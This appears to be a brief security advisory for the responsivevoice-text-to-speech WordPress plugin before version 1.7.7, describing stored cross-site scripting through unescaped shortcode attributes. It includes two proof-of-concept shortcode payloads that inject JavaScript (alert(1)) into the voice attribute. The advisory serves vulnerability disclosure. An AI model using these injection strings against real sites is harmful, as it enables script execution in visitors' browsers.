The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
[responsivevoice_button voice=‘“); alert(1); (”’] [responsivevoice_button voice=‘“);}}; jQuery(function() {alert(1); }); if(false){if(false){(”’]
CPE | Name | Operator | Version |
---|---|---|---|
responsivevoice-text-to-speech | lt | 1.7.7 |